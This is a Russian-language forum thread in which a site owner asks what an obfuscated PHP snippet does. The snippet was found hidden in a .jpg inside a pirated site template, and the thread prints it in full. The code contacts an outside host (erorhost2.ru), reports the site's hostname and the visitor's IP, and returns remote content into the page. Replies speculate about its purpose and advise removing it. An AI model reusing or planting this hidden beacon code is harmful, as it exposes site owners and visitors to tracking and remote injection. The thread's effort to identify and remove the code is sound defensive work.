Что нового

Кто нибудь знает... (1 Viewer)

  • Автор темы Deleted User
  • Дата начала
D

Deleted User

Гость
WebSet,Цитата: dw13,а а также в большинстве шаблонов с NulledWS
 
Доброго времени суток....Подскажите что этот код делает?<?php $x0f=\"f\\151\\x6c\\x65\"; $x10=\"\\146\\x73\\157ck\\157\\160\\145\\156\"; $x11=\"\\x69\\x6dp\\x6co\\144\\145\"; $x0b = @$x10(\"\\145ro\\x72\\150\\157\\x73\\1642\\056r\\x75\", 80, $x0c, $x0d, 6); if(!$x0b){return \'\'; }else{$x0e = @$x0f(\"\\x68\\x74tp:\\x2f/\\145r\\x6f\\x72\\150o\\x73t2.\\x72\\165\\x2fid\\x31\\x2e\\x70h\\160?si\\x74e=$_SERVER[HTTP_HOST]&i\\160=$_SERVER[REMOTE_ADDR]\");return $x11(\'\',$x0e); }?>
 
marilym,а можно немного расшифровать что он делает? пожалуйстав login.tpl ссылкается на файл с этим кодом и че то я не уверен что тут все хорошо...я бы и не заметил это если в логах не посмотрел ошибки
 
Сайт исполняющий код в студию....з.ы. Где Вы его достали ?
 
kkvp,чёт на дос смахивает чего тоВполне возможно что я ошибаюсь =)
 
BLOTTER,ну я решил на свой ГС установить шаблон скриперсазахожу короче в логи смотрю ошибка в 3 линии файл kontasa.jpgдумаю как так... в картинке ошибка что ли... открыл через блокнот там этот код лежит...начал дальше рыться вот в login.tpl прописан путь к этой картинкену сделал вывод что крысит пороли... решил спросить у вас мастеровтут картинка этаneoks-warez-ver2\\images\\ico\\kontasa.jpg
 
WebSet,ну почему же ни как удалить то удалюпросто мне интересно что это за код...sanches,может быть... не просто же так шаб в паблик ушел...тем более слышал что злой готовит дос на скриперс с новой армией )))
 
kkvp,удалить путь с login.tpl к картинке никак?
 
kkvp,ддос через рхр код? не смешите... +)кража паролей... кому нужно будет столько паролей? :Dможет какой-то шутник решил часть кода из login.tpl кинуть в картинку и прикрепил, чтобы какой-то подозрительный админ удалил файлик, и у него шаблон поехал честно я хз, шаб не качал =)
 
Кто верстал у того надо спросить, или кто то решил воспользоваться что шабик свежий и прописал в нём \"зло\"код для получения инфыИМХО*
 
Отвечу так, уже почти больше года, хакеры практикуют взлом всего сайта лишь из обычной картинки формата jpg или gif....суть проста...хакер, грамотно ставит код в картинку...и вуаля, у него почти полный доступ к ресурсу.....скорее всего, в одном из шаблонов, был такой скрипт\\картинка....совет, удалите картинку и поставьте свою....а в обще совет...замените всю графику в шаблоне.....Можете в гугл вбить запрос \"взлом сайта через изображение или картинку\"
 
photomakes,значит надо неокса сюдаBLOTTER,спасибо за инфу
 
WebSet,ну от куда я качал, там заливал неокс!либо кто то из под его ника общалсяхз на сто % сказать не могу
 
Цитата: kkvpзначит надо неокса сюдане факт что его! хакер тупо скачал шаб, написал скрип/картинку, как упомянули выше, и опубликовал, а все претензии к автору... схема проста
 
Цитата: WebSetшаб неокс заливал разве? :)Цитата: kkvpneoks-warez-ver2\\images\\ico\\kontasa.jpg
 
Отправить шаблон на карантин и далее быть аккуратнее, с начало тестировать шаб на локальном серваке, потом ставить.А что с этим вроде уже решили...тут претензии предъявлять без уверенности на 99% не вариант...
 

Пользователи, просматривающие данную тему

Верх